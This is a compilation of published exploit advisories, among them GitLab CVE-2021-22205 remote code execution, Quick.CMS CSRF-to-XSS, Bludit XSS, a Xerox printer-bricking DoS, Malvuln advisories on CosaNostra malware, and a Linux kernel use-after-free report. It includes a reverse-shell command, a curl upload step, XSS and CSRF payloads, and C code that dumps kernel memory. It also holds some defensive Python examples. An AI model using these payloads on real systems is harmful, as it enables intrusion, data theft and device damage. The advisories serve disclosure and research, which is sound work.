<pre><code># Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)<br /># Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22<br /># Date: 11/01/2021<br /># Exploit Author: Jacob Baines<br /># Vendor Homepage: https://about.gitlab.com/<br /># Software Link: https://gitlab.com/gitlab-org/gitlab<br /># Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8<br /># Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)<br /># CVE : CVE-2021-22205<br /># Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/<br /># Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed<br /><br />Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps: first generate the payload, then send it.<br /><br />1. Generating the payload. 
This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.<br /><br />echo -e "[base64-encoded DjVu payload removed]" | base64 -d > lol.jpg<br />echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg<br />echo -n "[base64-encoded payload trailer removed]" | base64 -d >> lol.jpg<br /><br />2. Sending the payload. Any random endpoint will do.<br /><br />curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8)<br /><br />2a. Sample Output from the reverse shell:<br /><br />$ nc -lnvp 1270<br />Listening on [0.0.0.0] (family 0, port 1270)<br />Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport<br />34836)<br />whoami<br />git<br />id<br />uid=998(git) gid=998(git) groups=998(git)<br /></code></pre>
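A content-sniffing gate of the kind the GitLab exploit above relies on being absent, added here as an example and not GitLab's own fix: the DjVu container always begins with the bytes `AT&TFORM`, a 4-byte length and a form type, so a DjVu body named `lol.jpg` is identified by its content and refused before any metadata tool such as ExifTool sees it. The sample bytes are constructed, not the exploit payload; the allowlist of accepted types is an assumption.

```python
import struct

# DjVu container layout: "AT&TFORM", 4-byte big-endian length, then a form type.
DJVU_MAGIC = b"AT&TFORM"
DJVU_FORMS = {b"DJVU", b"DJVM", b"DJVI"}

# Image signatures an upload pipeline would normally allow through to ExifTool.
JPEG_MAGIC = b"\xff\xd8\xff"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"


def is_djvu(data):
    """True if the bytes begin with a DjVu IFF container, whatever the filename."""
    if len(data) < 16 or not data.startswith(DJVU_MAGIC):
        return False
    (length,) = struct.unpack(">I", data[8:12])
    return length > 0 and data[12:16] in DJVU_FORMS


def sniff_type(data):
    """Classify an upload by content only; the extension is never consulted."""
    if is_djvu(data):
        return "djvu"
    if data.startswith(JPEG_MAGIC):
        return "jpeg"
    if data.startswith(PNG_MAGIC):
        return "png"
    return "unknown"


def extension_of(filename):
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def admission_decision(filename, data, allowed=("jpeg", "png")):
    """Gate to run before any metadata tool: return (accept, reason).

    Both the sniffed type and its agreement with the extension are checked, so
    a DjVu body named lol.jpg (the advisory's trick) is rejected twice over.
    `allowed` is an assumption for this example.
    """
    kind = sniff_type(data)
    if kind not in allowed:
        return False, f"content type {kind!r} is not allowed"
    ext = extension_of(filename)
    if ext in ("jpg", "jpeg"):
        ext = "jpeg"
    if ext != kind:
        return False, f"extension {ext!r} does not match content {kind!r}"
    return True, "ok"


# Constructed samples (not the advisory's payload): a minimal DjVu header with
# a placeholder DIRM chunk name, and a minimal JPEG header.
FAKE_DJVU_AS_JPG = DJVU_MAGIC + struct.pack(">I", 0x3AF) + b"DJVM" + b"DIRM" + b"\x00" * 8
REAL_JPEG = JPEG_MAGIC + b"\xe0" + b"\x00" * 20

if __name__ == "__main__":
    print(admission_decision("lol.jpg", FAKE_DJVU_AS_JPG))  # rejected: djvu not allowed
    print(admission_decision("photo.jpg", REAL_JPEG))       # accepted
```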
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/61285c988de52b7c067fb2e703f2ab83_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: CosaNostra Builder WebPanel <br />Vulnerability: Insecure Crypto<br />Description: The password for the panel is stored in the MySQL database using the insecure MD5 hash algorithm with no salt. MD5 is a general-purpose fast hash (not a slow password hash), and the absence of a salt lets attackers who obtain the hash run faster cracking attacks using pre-computed dictionaries.<br />Type: WebUI<br />MD5: 61285c988de52b7c067fb2e703f2ab83<br />Vuln ID: MVID-2022-0472<br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />id user password<br />1 admin 21232f297a57a5a743894a0e4a801fc3<br /><br />Default password is "admin".<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
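The two halves of the Malvuln advisory's point above, added here as an example (not the panel's code): a pre-computed MD5 dictionary recovers the stored unsalted hash with one lookup, while a salted, iterated hash gives each user a different stored value and makes every guess cost time. The stored hash is the one from the advisory; the wordlist and the PBKDF2 iteration count are constructed assumptions.

```python
import hashlib
import hmac
import os

# Value from the advisory's panel dump (MD5 of the default password).
STORED_HASH = "21232f297a57a5a743894a0e4a801fc3"

# Constructed mini wordlist standing in for a pre-computed dictionary.
WORDLIST = ["123456", "password", "letmein", "admin", "qwerty"]

# Assumption: iteration count in line with OWASP's 2021 guidance for PBKDF2-HMAC-SHA256.
PBKDF2_ROUNDS = 310_000


def build_md5_table(words):
    """Pre-compute hash -> word once; with no salt, one table serves every user."""
    return {hashlib.md5(w.encode()).hexdigest(): w for w in words}


def lookup_unsalted_md5(stored_hash, table):
    """A single dictionary lookup recovers an unsalted MD5 password (or None)."""
    return table.get(stored_hash.lower())


def hash_password(password, salt=None):
    """Salted, slow hash: a per-user random salt defeats shared pre-computed
    tables, and the iteration count makes each guess cost real time."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${digest.hex()}"


def verify_password(password, encoded):
    """Constant-time verification of a value produced by hash_password."""
    scheme, rounds, salt_hex, digest_hex = encoded.split("$")
    if scheme != "pbkdf2_sha256":
        raise ValueError("unsupported scheme")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    print("unsalted md5 lookup:", lookup_unsalted_md5(STORED_HASH, build_md5_table(WORDLIST)))
    stored = hash_password("admin")
    print("same password, different salted hashes:", stored != hash_password("admin"))
    print("verify:", verify_password("admin", stored), verify_password("admin1", stored))
```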
<pre><code># Exploit Title: Quick.CMS 6.7 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated)<br /># Date: 2021-04-21<br /># Exploit Author: Rahad Chowdhury<br /># Vendor Homepage: https://opensolution.org/<br /># Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip<br /># Version: 6.7<br /># Tested on: Windows 8.1, Kali Linux, Burp Suite<br /><br />Steps to Reproduce:<br /><br />1. First, log in to your admin panel<br />2. Then click the "Sliders" menu and choose "New Slider"<br />3. Now intercept the request with Burp Suite and save a new slider<br />4. Then use the XSS payload </textarea><script>alert(document.domain)</script><br />in the sDescription value.<br />5. Now generate a CSRF PoC<br /><br /><!DOCTYPE html><br /><html><br /><body><br /> <form action="http://127.0.0.1/admin.php?p=sliders-form" method="POST"><br /> <input type="hidden" name="iSlider" value=""><br /> <input type="hidden" name="aFile" filename=""><br /> <input type="hidden" name="sFileNameOnServer" value="slider_2.jpg"><br /> <input type="hidden" name="sDescription" value="test</textarea><script>alert(document.cookie)</script>"><br /> <input type="hidden" name="iPosition" value="1"><br /> <input type="hidden" name="sOption" value="save"><br /> <input type="submit" value="submit"><br /> </form><br /></body><br /></html><br /></code></pre>
<pre><code>[+] Credits: Mahmoud Al-Qudsi<br />[+] Website: https://neosmart.net/<br />[+] Source: https://neosmart.net/blog/?p=4865<br />[+] Media: https://twitter.com/mqudsi and https://twitter.com/neosmart<br /><br />[Vendor]<br />Xerox Corporation<br /><br />[Product]<br />Xerox Versalink printers, other Xerox printers/copiers.<br /><br />[Vulnerability Type]<br />Remote denial-of-service leading to bricked device.<br /><br />[Security Issue]<br />A specifically crafted TIFF payload may be submitted to the printer's job queue<br />(in person or over the network) by unauthenticated/unprivileged users or network<br />or internet attackers by means of a JavaScript payload. The device will panic<br />upon attempting to read the submitted file and a physical reboot will be<br />required. Upon reboot, the device will attempt to resume the last-printed job,<br />triggering the panic once more. The process repeats ad infinitum.<br /><br />[Exploit/PoC]<br />Extract the TIFF contents of the base64-encoded archive below and submit directly<br />to the job queue on a vulnerable printer to trigger the exploit:<br /><br />[base64-encoded archive containing the TIFF payload removed]<br /><br />[Network Access]<br />Local or remote<br /><br />The sample payload may also be submitted to exploit a Xerox printer with a known<br />IP address or host name over the web by taking advantage of the unprotected HTTP<br />POST interface exposed by the device on its network interface.<br /><br />[Severity]<br />Critical<br /><br />The denial-of-service attack 
results in a semi-permanent "bricking" of the Xerox<br />printer. Recovery may be possible if there are unapplied firmware updates by<br />forcing an update over the network, which clears the job queue in the process.<br />Otherwise, manually clearing the non-volatile storage memory on the device's<br />mainboard is required to break out of the loop.<br /><br />[Disclosure Timeline]<br />- September 26, 2019: Reported to Xerox<br />- January 14, 2020: Confirmed by Xerox in response to a request for updates<br />- January 25, 2022: Publicly disclosed, remains unpatched and exploitable<br /><br />Mahmoud<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)
# Date: 19/10/2021
# Exploit Author: Vasu (tamilan_mkv)
# Vendor Homepage: https://www.bludit.com
# Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip
# Version: bludit-3-13-1
# Tested on: kali linux
# CVE : CVE-2021-35323

### Steps to reproduce

1. Open the login page http://localhost:800/admin/login
2. Enter `admin"><img src=x onerror=alert(1)>` in the username field and enter the password
3. Trigger the malicious JavaScript code

</code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/61285c988de52b7c067fb2e703f2ab83.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: CosaNostra Builder
Vulnerability: Insecure Permissions
Description: The malware creates PE files with insecure permissions when writing to the c:\ drive, granting change (C) permissions to the Authenticated Users group. Standard users can rename the executable dropped by the malware to disable it, or replace it with their own executable, then wait for a privileged user to log on to the infected machine to potentially escalate privileges.
Type: PE32
MD5: 61285c988de52b7c067fb2e703f2ab83
Vuln ID: MVID-2022-0471
Disclosure: 01/24/2022

Exploit/PoC:
C:\>cacls hate.exe
C:\hate.exe BUILTIN\Administrators:(ID)F
            NT AUTHORITY\SYSTEM:(ID)F
            BUILTIN\Users:(ID)R
            NT AUTHORITY\Authenticated Users:(ID)C

C:\>dir hate.exe
 Volume in drive C has no label.

 Directory of C:\

01/23/2022  11:37 PM           112,140 hate.exe
               1 File(s)        112,140 bytes
               0 Dir(s)  27,572,977,664 bytes free

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
</code></pre>
<pre><code>Linux: UAF read: SO_PEERCRED and SO_PEERGROUPS race with listen() (and connect())

# bug description

In sock_getsockopt() (in net/core/sock.c), the handlers for the
socket options SO_PEERCRED (has probably had a data race since forever
that got turned into a UAF read in v2.6.36, commit "af_unix: Allow
SO_PEERCRED to work across namespaces") and
SO_PEERGROUPS (introduced in v4.13, commit "net: introduce SO_PEERGROUPS
getsockopt") don't use any locking when copying data from
sk->sk_peer_cred to userspace.

This can race with operations that update sk->sk_peer_cred:

 - unix_stream_connect() (via copy_peercred(), on CLOSE->ESTABLISHED)
 - unix_listen() (via init_peercred(), on CLOSE->LISTEN or LISTEN->LISTEN)

This means that if the creds are replaced and freed at the wrong time, a
use-after-free read occurs.

From what I can tell, the impact on the kernel is limited to data leakage.
Theoretically, it could also lead to an out-of-bounds *write* to
*userspace* memory if a victim process calls SO_PEERGROUPS on a socket
whose ->sk_peer_cred is going away; however, in a normal scenario,
SO_PEERGROUPS would only be called on a socket from accept(), and a
less-privileged attacker wouldn't be able to switch out the ->sk_peer_cred
on that socket.



# simple testcase

In a Linux VM with CONFIG_KASAN=y and CONFIG_RCU_STRICT_GRACE_PERIOD=y,
this issue can be demonstrated with the following testcase.

Note that this testcase is using SO_PEERCRED in a weird way: It reads
the "peer credentials" of a listening socket, which doesn't really make
any semantic sense. As far as I can tell from reading the code, you
could also trigger the same UAF by racing SO_PEERCRED with repeated
calls to connect() and shutdown(<fd>, SHUT_RDWR) instead of listen(),
but then the race would get more complicated.

```
// compile with "gcc -pthread -o peercred_uaf peercred_uaf.c -Wall"
#define _GNU_SOURCE
#include <pthread.h>
#include <sys/fsuid.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <err.h>
#include <unistd.h>
#include <stdio.h>
#include <sys/syscall.h>

static int s;
static uid_t my_uid;
static gid_t my_gid;

// reader side of the race: hammers SO_PEERCRED on the listening socket
void *ucred_thread(void *dummy) {
  while (1) {
    struct ucred ucred;
    socklen_t optlen = sizeof(ucred);
    if (getsockopt(s, SOL_SOCKET, SO_PEERCRED, &ucred, &optlen))
      perror("getsockopt");
  }
}

int main(void) {
  my_uid = getuid();
  my_gid = getgid();

  s = socket(AF_UNIX, SOCK_STREAM, 0);
  if (s == -1) err(1, "socket");
  struct sockaddr_un bind_addr = {
    .sun_family = AF_UNIX,
    .sun_path = "/tmp/unix-test-socket"
  };
  unlink(bind_addr.sun_path);
  if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))
    err(1, "bind");

  pthread_t thread;
  if (pthread_create(&thread, NULL, ucred_thread, NULL))
    errx(1, "pthread_create");

  // writer side of the race: each listen() replaces sk_peer_cred via
  // init_peercred(), each setresuid() allocates fresh creds for the task
  while (1) {
    if (listen(s, 16))
      perror("listen");
    // avoid glibc's automatic thread sync in set*id() wrappers!
    // note that setfsuid() doesn't reallocate on no-op request.
    if (syscall(__NR_setresuid, my_uid, my_uid, my_uid))
      err(1, "setresuid(raw)");
  }
}
```

This results in the following splat:

```
BUG: KASAN: use-after-free in sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)
Read of size 4 at addr ffff8880355c7c64 by task peercred_uaf/619

CPU: 2 PID: 619 Comm: peercred_uaf Not tainted 5.15.0-rc2-00008-g4c17ca27923c #849
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
Call Trace:
 dump_stack_lvl (lib/dump_stack.c:107 (discriminator 1))
 print_address_description.constprop.0 (mm/kasan/report.c:257)
[...]
 kasan_report.cold (mm/kasan/report.c:443 mm/kasan/report.c:459)
[...]
 sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555)
[...]
 __sys_getsockopt (net/socket.c:2216)
[...]
 __x64_sys_getsockopt (net/socket.c:2232)
[...]
 do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)
RIP: 0033:0x7f93cd99a5ca
Code: 48 8b 0d c9 08 0c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 37 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 96 08 0c 00 f7 d8 64 89 01 48
All code
========
   0:  48 8b 0d c9 08 0c 00    mov    0xc08c9(%rip),%rcx        # 0xc08d0
   7:  f7 d8                   neg    %eax
   9:  64 89 01                mov    %eax,%fs:(%rcx)
   c:  48 83 c8 ff             or     $0xffffffffffffffff,%rax
  10:  c3                      ret
  11:  66 2e 0f 1f 84 00 00    cs nopw 0x0(%rax,%rax,1)
  18:  00 00 00
  1b:  0f 1f 44 00 00          nopl   0x0(%rax,%rax,1)
  20:  49 89 ca                mov    %rcx,%r10
  23:  b8 37 00 00 00          mov    $0x37,%eax
  28:  0f 05                   syscall
  2a:* 48 3d 01 f0 ff ff       cmp    $0xfffffffffffff001,%rax     <-- trapping instruction
  30:  73 01                   jae    0x33
  32:  c3                      ret
  33:  48 8b 0d 96 08 0c 00    mov    0xc0896(%rip),%rcx        # 0xc08d0
  3a:  f7 d8                   neg    %eax
  3c:  64 89 01                mov    %eax,%fs:(%rcx)
  3f:  48                      rex.W

Code starting with the faulting instruction
===========================================
   0:  48 3d 01 f0 ff ff       cmp    $0xfffffffffffff001,%rax
   6:  73 01                   jae    0x9
   8:  c3                      ret
   9:  48 8b 0d 96 08 0c 00    mov    0xc0896(%rip),%rcx        # 0xc08a6
  10:  f7 d8                   neg    %eax
  12:  64 89 01                mov    %eax,%fs:(%rcx)
  15:  48                      rex.W
RSP: 002b:00007f93cd89bec8 EFLAGS: 00000246 ORIG_RAX: 0000000000000037
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f93cd99a5ca
RDX: 0000000000000011 RSI: 0000000000000001 RDI: 0000000000000003
RBP: 00007f93cd89bef0 R08: 00007f93cd89bee0 R09: 00007f93cd89c700
R10: 00007f93cd89bee4 R11: 0000000000000246 R12: 00007ffff07f1cee
R13: 00007ffff07f1cef R14: 00007f93cd89c700 R15: 0000000000000000

Allocated by task 618:
 kasan_save_stack (mm/kasan/common.c:38)
 __kasan_slab_alloc (mm/kasan/common.c:46 mm/kasan/common.c:434 mm/kasan/common.c:467)
 kmem_cache_alloc (./include/linux/kasan.h:254 mm/slab.h:519 mm/slub.c:3206 mm/slub.c:3214 mm/slub.c:3219)
 prepare_creds (kernel/cred.c:262)
 __sys_setresuid (kernel/sys.c:666)
 do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)

Freed by task 618:
 kasan_save_stack (mm/kasan/common.c:38)
 kasan_set_track (mm/kasan/common.c:46)
 kasan_set_free_info (mm/kasan/generic.c:362)
 __kasan_slab_free (mm/kasan/common.c:368 mm/kasan/common.c:328 mm/kasan/common.c:374)
 kmem_cache_free (mm/slub.c:1725 mm/slub.c:3483 mm/slub.c:3499)
 rcu_core (kernel/rcu/tree.c:2515 kernel/rcu/tree.c:2743)
 __do_softirq (./include/linux/instrumented.h:71 ./include/linux/atomic/atomic-instrumented.h:27 ./include/linux/jump_label.h:266 ./include/linux/jump_label.h:276 ./include/trace/events/irq.h:142 kernel/softirq.c:559)

Last potentially related work creation:
 kasan_save_stack (mm/kasan/common.c:38)
 kasan_record_aux_stack (mm/kasan/generic.c:348)
 call_rcu (kernel/rcu/tree.c:2988 kernel/rcu/tree.c:3067)
 init_peercred (./include/linux/cred.h:288 ./include/linux/cred.h:281 net/unix/af_unix.c:613)
 unix_listen (net/unix/af_unix.c:648)
 __sys_listen (net/socket.c:1727)
 __x64_sys_listen (net/socket.c:1734)
 do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113)

The buggy address belongs to the object at ffff8880355c7c40
 which belongs to the cache cred_jar of size 192
The buggy address is located 36 bytes inside of
 192-byte region [ffff8880355c7c40, ffff8880355c7d00)
The buggy address belongs to the page:
page:ffffea0000d57100 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x355c4
head:ffffea0000d57100 order:2 compound_mapcount:0 compound_pincount:0
flags: 0x4000000000010200(slab|head|zone=1)
raw: 4000000000010200 ffffea0000d57208 ffffea0000d57008 ffff88800642d1c0
raw: 0000000000000000 0000000000190019 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected

Memory state around the buggy address:
 ffff8880355c7b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
 ffff8880355c7b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
>ffff8880355c7c00: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb
                                                       ^
 ffff8880355c7c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
 ffff8880355c7d00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
```


# root-only reproducer for normal systems
The following is a simple reproducer that attempts to use this issue to
dump gigabytes of out-of-bounds kernel memory via SO_PEERGROUPS, which
effectively reads a copy length (sk->sk_peer_cred->group_info->ngroups)
from a dangling pointer in groups_to_user().
(Note: There are two functions called groups_to_user(). The relevant one
is in net/core/sock.c.)

This isn't quite a real exploit - it **requires root privileges** to
call setgroups() and, if userfaultfd is restricted, also to trap a kernel
fault with userfaultfd. I expect that you could get around those
limitations with some work though, assuming that the attacker is running
in a normal Linux userspace.

Note that this bug can still be used to dump gigabytes of kernel heap
memory, even if CONFIG_HARDENED_USERCOPY is enabled, because the
out-of-bounds read occurs outside of usercopy code:

```
static int groups_to_user(gid_t __user *dst, const struct group_info *src)
{
	struct user_namespace *user_ns = current_user_ns();
	int i;

	for (i = 0; i < src->ngroups; i++)
		if (put_user(from_kgid_munged(user_ns, src->gid[i]), dst + i))
			return -EFAULT;

	return 0;
}
```


```
// gcc -o peergroups-leak peergroups-leak.c -Wall -pthread
#define _GNU_SOURCE
#include <pthread.h>
#include <stdbool.h>
#include <stdlib.h>
#include <stdint.h>     // uint64_t (pagemap entries)
#include <string.h>     // memset/strlen
#include <sys/stat.h>
#include <err.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <grp.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <fcntl.h>
#include <sys/eventfd.h>
#include <limits.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <linux/userfaultfd.h>
#include <linux/membarrier.h>

// kernel sets upper limit: 65536.
// up to 2 pages will be served by slabs, we probably don't want that.
// choose a size between order-3 and order-4 (means needs order-4 page)
#define ALLOC_SIZE ((0x1000 << 3) * 3 / 2)
#define NUM_GROUPS ((ALLOC_SIZE - 8) / 4)
#define OUTPUT_MAPPING_LEN 0x400000000

static int s;
static int launch_eventfd;
static unsigned char *output_mapping;

// blocks on the eventfd, then issues the SO_PEERGROUPS copy into a
// mapping whose first page is userfaultfd-registered so the copy stalls
static void *getsockopt_threadfn(void *dummy) {
  eventfd_t evval;
  if (eventfd_read(launch_eventfd, &evval))
    err(1, "eventfd_read");
  socklen_t optlen = INT_MAX;
  if (getsockopt(s, SOL_SOCKET, SO_PEERGROUPS, output_mapping, &optlen)) {
    perror("getsockopt");
    //system("cat /proc/$PPID/maps | grep -v AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
    exit(1);
  }
  return NULL;
}

void dump(char *label) {
  printf("\n=== DUMP %s ===\n", label);
  system("grep 'Node.*Unmovable' /proc/pagetypeinfo");
}

int main(void) {
  char dummy_char;

  // set up sleep-inducing mapping
  output_mapping = mmap(NULL, OUTPUT_MAPPING_LEN+0x1000, PROT_READ|PROT_WRITE,
                        MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
  if (output_mapping == MAP_FAILED) err(1, "mmap");
  if (mprotect(output_mapping+OUTPUT_MAPPING_LEN, 0x1000, PROT_NONE))
    err(1, "mprotect");
  int uffd = syscall(__NR_userfaultfd, O_CLOEXEC);
  if (uffd == -1) err(1, "userfaultfd");
  struct uffdio_api api = {
    .api = UFFD_API,
    .features = 0
  };
  if (ioctl(uffd, UFFDIO_API, &api))
    err(1, "UFFDIO_API");
  struct uffdio_register reg = {
    .range = {.start = (unsigned long)output_mapping, .len = 0x1000},
    .mode = UFFDIO_REGISTER_MODE_MISSING
  };
  if (ioctl(uffd, UFFDIO_REGISTER, &reg))
    err(1, "UFFDIO_REGISTER");

  // prepare getsockopt() thread
  launch_eventfd = eventfd(0, 0);
  if (launch_eventfd == -1) err(1, "eventfd");
  pthread_t thread;
  if (pthread_create(&thread, NULL, getsockopt_threadfn, NULL))
    errx(1, "pthread_create");

  // set up for reallocation primitive
  int realloc_fd = open("/proc/self/maps", O_RDONLY);
  if (realloc_fd == -1) err(1, "open maps");

  char tmpdir[] = "/tmp/blah.XXXXXX";
  if (mkdtemp(tmpdir) == NULL) err(1, "mkdtemp");
  if (chdir(tmpdir)) err(1, "chdir tmpdir");
  char dummy_name[100];
  memset(dummy_name, 'A', 99);
  dummy_name[99] = '\0';
  char move_target[200];
  sprintf(move_target, "d/%s", dummy_name);
  mkdir(dummy_name, 0700);
  char file_path[200];
  sprintf(file_path, "%s/a", dummy_name);
  int path_len = strlen(tmpdir) + strlen(file_path); // approximate
  {
    int fd = open(file_path, O_CREAT|O_RDWR, 0600);
    if (fd == -1) err(1, "open deep file");
    if (mmap((void*)0x10000UL, 0x1000, PROT_READ, MAP_SHARED, fd, 0) == MAP_FAILED)
      err(1, "mmap deep");
  }
  bool half_deep_probed = false;
  while (path_len < ALLOC_SIZE) {
    mkdir("d", 0700);
    if (rename(dummy_name, move_target)) err(1, "rename");
    if (rename("d", dummy_name)) err(1, "rename 2");
    path_len += strlen(dummy_name) + 1;
    if (!half_deep_probed && path_len >= ALLOC_SIZE / 2) {
      half_deep_probed = true;
      if (pread(realloc_fd, &dummy_char, 1, 0) != 1)
        err(1, "read maps half-deep");
    }
  }

  s = socket(AF_UNIX, SOCK_STREAM, 0);
  if (s == -1) err(1, "socket");
  struct sockaddr_un bind_addr = {
    .sun_family = AF_UNIX,
    .sun_path = "/tmp/unix-test-socket"
  };
  unlink(bind_addr.sun_path);
  if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))
    err(1, "bind");

  pid_t child = fork();
  if (child == -1) err(1, "fork");
  if (child == 0) {
    gid_t gid_list[NUM_GROUPS];
    gid_t my_gid = getgid();
    for (int i=0; i<NUM_GROUPS; i++) {
      gid_list[i] = my_gid; // (kernel doesn't deduplicate)
    }
    dump("before setgroups");
    if (setgroups(NUM_GROUPS, gid_list))
      err(1, "setgroups");
    dump("after setgroups, expect -1");
    if (listen(s, 16))
      err(1, "listen in child");
    return 0;
  }
  int status;
  if (waitpid(child, &status, 0) != child)
    err(1, "wait");
  if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
    errx(1, "child didn't exit cleanly");

  // wildly flailing around in the hope of flushing out the task
  // (but not the creds yet)
  usleep(400 * 1000);
  for (int i=0; i<4; i++)
    syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);

  // launch getsockopt, and wait for it to start
  if (eventfd_write(launch_eventfd, 1)) err(1, "eventfd_write");
  usleep(500 * 1000);

  // schedule RCU freeing of the creds
  if (listen(s, 16))
    err(1, "listen in parent");
  // wait for RCU (twice to be safe - yes, this is senseless voodoo)
  for (int i=0; i<2; i++)
    syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);

  // crappy reallocation attempt, should overwrite length with ASCII
  dump("pre-reallocation, expect +1");
  if (pread(realloc_fd, &dummy_char, 1, 0) != 1)
    err(1, "read maps deep");
  dump("post-reallocation, expect -1");

  // resume getsockopt
  struct uffdio_zeropage zeropage = {
    .range = {.start = (unsigned long)output_mapping, .len = 0x1000}
  };
  if (ioctl(uffd, UFFDIO_ZEROPAGE, &zeropage)) err(1, "ZEROPAGE");

  // wait for getsockopt to finish
  if (pthread_join(thread, NULL)) err(1, "pthread_join");

  // dump results
  int pagemap_fd = open("/proc/self/pagemap", O_RDONLY);
  if (pagemap_fd == -1) err(1, "open pagemap");
  unsigned long filled_pages = 0;
  for (unsigned long addr = (unsigned long)output_mapping;
       addr < (unsigned long)output_mapping + OUTPUT_MAPPING_LEN;
       addr += 0x1000) {
    uint64_t val;
    if (pread(pagemap_fd, &val, sizeof(val), addr / 0x1000 * 8) != sizeof(val))
      err(1, "pagemap read");
    if ((val >> 62) == 0)
      break;
    filled_pages++;
  }
  printf("got %lu pages\n", filled_pages);
  FILE *hexdump = popen("hexdump -C", "w");
  if (!hexdump)
    err(1, "popen");
  fwrite(output_mapping, filled_pages * 0x1000, 1, hexdump);
  pclose(hexdump);
}
```



# disclosure deadline
This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2021-12-27.




Found by: jhannh@google.com
</code></pre>
